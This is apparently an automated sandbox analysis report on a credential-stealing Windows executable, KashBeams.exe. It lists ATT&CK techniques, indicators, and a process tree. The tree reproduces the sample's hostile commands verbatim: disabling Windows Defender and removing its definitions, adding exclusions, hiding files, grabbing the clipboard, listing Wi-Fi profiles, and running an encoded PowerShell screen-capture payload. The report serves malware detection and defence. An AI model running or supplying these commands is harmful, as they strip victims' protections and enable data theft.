10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9

Analysis

max time kernel
94s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-01-2025 02:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KashBeams.exe
Size

7.5MB
MD5

309098a7fec40953d398abfd44794952
SHA1

031947e64a71a5ff9c5589c6cddcb26742cfd7c6
SHA256

10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9
SHA512

2567ca1482ecf65eb7aab2e50274b87999fc8c5add37fcfc2a259df323a5761178b326dd240e1446a906eb7a8f739dbf0118d61ac72a9f85b78224736523b34f
SSDEEP

196608:7qLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jT:KL+9qz8LD7fEUbiIqQgpT

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1328	powershell.exe
4220	powershell.exe
948	powershell.exe
3100	powershell.exe
3184	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	KashBeams.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4472	cmd.exe
756	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1620	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe
4428	KashBeams.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3140	tasklist.exe
2160	tasklist.exe
4772	tasklist.exe
1492	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1996	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cac-21.dat	upx
behavioral2/memory/4428-25-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp	upx
behavioral2/memory/4428-32-0x00007FFFC34F0000-0x00007FFFC34FF000-memory.dmp	upx
behavioral2/files/0x0007000000023caa-31.dat	upx
behavioral2/memory/4428-30-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp	upx
behavioral2/files/0x0007000000023ca6-48.dat	upx
behavioral2/files/0x0007000000023ca5-47.dat	upx
behavioral2/files/0x0007000000023ca4-46.dat	upx
behavioral2/files/0x0007000000023ca3-45.dat	upx
behavioral2/files/0x0007000000023ca2-44.dat	upx
behavioral2/files/0x0007000000023ca1-43.dat	upx
behavioral2/files/0x0007000000023ca0-42.dat	upx
behavioral2/files/0x0007000000023c9e-41.dat	upx
behavioral2/files/0x0007000000023cb1-40.dat	upx
behavioral2/files/0x0007000000023cb0-39.dat	upx
behavioral2/files/0x0007000000023caf-38.dat	upx
behavioral2/files/0x0007000000023cab-35.dat	upx
behavioral2/files/0x0007000000023ca9-34.dat	upx
behavioral2/files/0x0007000000023c9f-28.dat	upx
behavioral2/memory/4428-54-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp	upx
behavioral2/memory/4428-56-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp	upx
behavioral2/memory/4428-58-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp	upx
behavioral2/memory/4428-60-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp	upx
behavioral2/memory/4428-62-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp	upx
behavioral2/memory/4428-64-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp	upx
behavioral2/memory/4428-66-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp	upx
behavioral2/memory/4428-74-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp	upx
behavioral2/memory/4428-76-0x00007FFFC08E0000-0x00007FFFC08ED000-memory.dmp	upx
behavioral2/memory/4428-81-0x00007FFFBB870000-0x00007FFFBB98B000-memory.dmp	upx
behavioral2/memory/4428-80-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp	upx
behavioral2/memory/4428-73-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp	upx
behavioral2/memory/4428-72-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp	upx
behavioral2/memory/4428-71-0x00007FFFC34E0000-0x00007FFFC34ED000-memory.dmp	upx
behavioral2/memory/4428-70-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp	upx
behavioral2/memory/4428-164-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp	upx
behavioral2/memory/4428-207-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp	upx
behavioral2/memory/4428-274-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp	upx
behavioral2/memory/4428-291-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp	upx
behavioral2/memory/4428-293-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp	upx
behavioral2/memory/4428-313-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp	upx
behavioral2/memory/4428-315-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp	upx
behavioral2/memory/4428-316-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp	upx
behavioral2/memory/4428-317-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp	upx
behavioral2/memory/4428-331-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp	upx
behavioral2/memory/4428-346-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp	upx
behavioral2/memory/4428-344-0x00007FFFC08E0000-0x00007FFFC08ED000-memory.dmp	upx
behavioral2/memory/4428-357-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp	upx
behavioral2/memory/4428-356-0x00007FFFC34E0000-0x00007FFFC34ED000-memory.dmp	upx
behavioral2/memory/4428-355-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp	upx
behavioral2/memory/4428-354-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp	upx
behavioral2/memory/4428-353-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp	upx
behavioral2/memory/4428-352-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp	upx
behavioral2/memory/4428-351-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp	upx
behavioral2/memory/4428-350-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp	upx
behavioral2/memory/4428-349-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp	upx
behavioral2/memory/4428-348-0x00007FFFC34F0000-0x00007FFFC34FF000-memory.dmp	upx
behavioral2/memory/4428-347-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp	upx
behavioral2/memory/4428-345-0x00007FFFBB870000-0x00007FFFBB98B000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4088	cmd.exe
4664	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4988	netsh.exe
3280	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2796	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3236	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4664	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3100	powershell.exe
1328	powershell.exe
3184	powershell.exe
3100	powershell.exe
3100	powershell.exe
1328	powershell.exe
1328	powershell.exe
3184	powershell.exe
3184	powershell.exe
756	powershell.exe
756	powershell.exe
1804	powershell.exe
1804	powershell.exe
756	powershell.exe
1804	powershell.exe
4220	powershell.exe
4220	powershell.exe
2852	powershell.exe
2852	powershell.exe
948	powershell.exe
948	powershell.exe
5092	powershell.exe
5092	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3140	tasklist.exe
Token: SeDebugPrivilege	2160	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2908	WMIC.exe
Token: SeSecurityPrivilege	2908	WMIC.exe
Token: SeTakeOwnershipPrivilege	2908	WMIC.exe
Token: SeLoadDriverPrivilege	2908	WMIC.exe
Token: SeSystemProfilePrivilege	2908	WMIC.exe
Token: SeSystemtimePrivilege	2908	WMIC.exe
Token: SeProfSingleProcessPrivilege	2908	WMIC.exe
Token: SeIncBasePriorityPrivilege	2908	WMIC.exe
Token: SeCreatePagefilePrivilege	2908	WMIC.exe
Token: SeBackupPrivilege	2908	WMIC.exe
Token: SeRestorePrivilege	2908	WMIC.exe
Token: SeShutdownPrivilege	2908	WMIC.exe
Token: SeDebugPrivilege	2908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2908	WMIC.exe
Token: SeRemoteShutdownPrivilege	2908	WMIC.exe
Token: SeUndockPrivilege	2908	WMIC.exe
Token: SeManageVolumePrivilege	2908	WMIC.exe
Token: 33	2908	WMIC.exe
Token: 34	2908	WMIC.exe
Token: 35	2908	WMIC.exe
Token: 36	2908	WMIC.exe
Token: SeDebugPrivilege	756	powershell.exe
Token: SeDebugPrivilege	4772	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2908	WMIC.exe
Token: SeSecurityPrivilege	2908	WMIC.exe
Token: SeTakeOwnershipPrivilege	2908	WMIC.exe
Token: SeLoadDriverPrivilege	2908	WMIC.exe
Token: SeSystemProfilePrivilege	2908	WMIC.exe
Token: SeSystemtimePrivilege	2908	WMIC.exe
Token: SeProfSingleProcessPrivilege	2908	WMIC.exe
Token: SeIncBasePriorityPrivilege	2908	WMIC.exe
Token: SeCreatePagefilePrivilege	2908	WMIC.exe
Token: SeBackupPrivilege	2908	WMIC.exe
Token: SeRestorePrivilege	2908	WMIC.exe
Token: SeShutdownPrivilege	2908	WMIC.exe
Token: SeDebugPrivilege	2908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2908	WMIC.exe
Token: SeRemoteShutdownPrivilege	2908	WMIC.exe
Token: SeUndockPrivilege	2908	WMIC.exe
Token: SeManageVolumePrivilege	2908	WMIC.exe
Token: 33	2908	WMIC.exe
Token: 34	2908	WMIC.exe
Token: 35	2908	WMIC.exe
Token: 36	2908	WMIC.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	1492	tasklist.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeIncreaseQuotaPrivilege	4992	WMIC.exe
Token: SeSecurityPrivilege	4992	WMIC.exe
Token: SeTakeOwnershipPrivilege	4992	WMIC.exe
Token: SeLoadDriverPrivilege	4992	WMIC.exe
Token: SeSystemProfilePrivilege	4992	WMIC.exe
Token: SeSystemtimePrivilege	4992	WMIC.exe
Token: SeProfSingleProcessPrivilege	4992	WMIC.exe
Token: SeIncBasePriorityPrivilege	4992	WMIC.exe
Token: SeCreatePagefilePrivilege	4992	WMIC.exe
Token: SeBackupPrivilege	4992	WMIC.exe
Token: SeRestorePrivilege	4992	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 4428	5032	KashBeams.exe	82
PID 5032 wrote to memory of 4428	5032	KashBeams.exe	82
PID 4428 wrote to memory of 2692	4428	KashBeams.exe	83
PID 4428 wrote to memory of 2692	4428	KashBeams.exe	83
PID 4428 wrote to memory of 908	4428	KashBeams.exe	84
PID 4428 wrote to memory of 908	4428	KashBeams.exe	84
PID 4428 wrote to memory of 1996	4428	KashBeams.exe	85
PID 4428 wrote to memory of 1996	4428	KashBeams.exe	85
PID 4428 wrote to memory of 1584	4428	KashBeams.exe	86
PID 4428 wrote to memory of 1584	4428	KashBeams.exe	86
PID 1996 wrote to memory of 4872	1996	cmd.exe	91
PID 1996 wrote to memory of 4872	1996	cmd.exe	91
PID 2692 wrote to memory of 3184	2692	cmd.exe	93
PID 1584 wrote to memory of 3100	1584	cmd.exe	92
PID 1584 wrote to memory of 3100	1584	cmd.exe	92
PID 2692 wrote to memory of 3184	2692	cmd.exe	93
PID 908 wrote to memory of 1328	908	cmd.exe	94
PID 908 wrote to memory of 1328	908	cmd.exe	94
PID 4428 wrote to memory of 1108	4428	KashBeams.exe	95
PID 4428 wrote to memory of 1108	4428	KashBeams.exe	95
PID 4428 wrote to memory of 2600	4428	KashBeams.exe	96
PID 4428 wrote to memory of 2600	4428	KashBeams.exe	96
PID 1108 wrote to memory of 3140	1108	cmd.exe	99
PID 1108 wrote to memory of 3140	1108	cmd.exe	99
PID 2600 wrote to memory of 2160	2600	cmd.exe	100
PID 2600 wrote to memory of 2160	2600	cmd.exe	100
PID 4428 wrote to memory of 4516	4428	KashBeams.exe	101
PID 4428 wrote to memory of 4516	4428	KashBeams.exe	101
PID 4428 wrote to memory of 4472	4428	KashBeams.exe	103
PID 4428 wrote to memory of 4472	4428	KashBeams.exe	103
PID 4428 wrote to memory of 1696	4428	KashBeams.exe	105
PID 4428 wrote to memory of 1696	4428	KashBeams.exe	105
PID 4428 wrote to memory of 2672	4428	KashBeams.exe	149
PID 4428 wrote to memory of 2672	4428	KashBeams.exe	149
PID 4428 wrote to memory of 3280	4428	KashBeams.exe	109
PID 4428 wrote to memory of 3280	4428	KashBeams.exe	109
PID 4516 wrote to memory of 2908	4516	cmd.exe	111
PID 4516 wrote to memory of 2908	4516	cmd.exe	111
PID 4472 wrote to memory of 756	4472	cmd.exe	113
PID 4472 wrote to memory of 756	4472	cmd.exe	113
PID 4428 wrote to memory of 460	4428	KashBeams.exe	114
PID 4428 wrote to memory of 460	4428	KashBeams.exe	114
PID 4428 wrote to memory of 3116	4428	KashBeams.exe	115
PID 4428 wrote to memory of 3116	4428	KashBeams.exe	115
PID 4428 wrote to memory of 208	4428	KashBeams.exe	118
PID 4428 wrote to memory of 208	4428	KashBeams.exe	118
PID 1696 wrote to memory of 4772	1696	cmd.exe	120
PID 1696 wrote to memory of 4772	1696	cmd.exe	120
PID 208 wrote to memory of 1804	208	cmd.exe	121
PID 208 wrote to memory of 1804	208	cmd.exe	121
PID 460 wrote to memory of 3236	460	cmd.exe	122
PID 460 wrote to memory of 3236	460	cmd.exe	122
PID 3280 wrote to memory of 4988	3280	cmd.exe	123
PID 3280 wrote to memory of 4988	3280	cmd.exe	123
PID 2672 wrote to memory of 2544	2672	cmd.exe	160
PID 2672 wrote to memory of 2544	2672	cmd.exe	160
PID 3116 wrote to memory of 644	3116	cmd.exe	125
PID 3116 wrote to memory of 644	3116	cmd.exe	125
PID 4428 wrote to memory of 2320	4428	KashBeams.exe	126
PID 4428 wrote to memory of 2320	4428	KashBeams.exe	126
PID 4428 wrote to memory of 3772	4428	KashBeams.exe	128
PID 4428 wrote to memory of 3772	4428	KashBeams.exe	128
PID 2320 wrote to memory of 900	2320	cmd.exe	130
PID 2320 wrote to memory of 900	2320	cmd.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4872	attrib.exe
3056	attrib.exe
2336	attrib.exe

C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
"C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5032
- C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
  "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
      4⤵
      Views/modifies file attributes
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3280
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:460
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3116
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsA